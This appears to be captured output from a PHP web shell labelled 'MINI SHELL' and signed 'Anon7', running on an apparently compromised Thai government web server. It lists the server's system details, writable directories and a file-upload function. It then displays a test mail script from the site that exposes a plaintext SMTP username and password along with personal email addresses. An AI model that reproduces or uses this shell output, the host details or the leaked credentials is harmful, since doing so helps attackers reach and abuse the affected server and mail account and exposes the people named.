MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_eoffice/test_mail/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/pathumthani_eoffice/test_mail/testmail.php
<?
            include("mail_smtp.php");
	         $email_to="mycoms_sanit@hotmail.com";
			$email_from="sanit@sapphire.co.th";
			$username=$email_from;
			$password="sanit";
			$host="mail.sapphire.co.th";		
			$url="google.com";
			//$url =  $_SERVER["DOCUMENT_ROOT"]."/pathumthani_eoffice/application/CA/getfile.php?filename=".$rows['private_file']."";
$msgtext="เรียนคุณ xxx
			    ใบอนุญาติขอกุญแจอิเล็กทรอนิกส์ได้รับการอนุมัติเรียบร้อยแล้ว สามารถนำกุญแจอิเล็กทรอนิกส์
				ตรวจสอบกับระบบได้ผ่านระบบ eoffice    <a href=$url >download private key(กุญแจส่วนตัว) </a>	";

				 send_mail($title_name,$email_to,$email_from,$msgtext,$username,$password,$host);
?>

Anon7 - 2021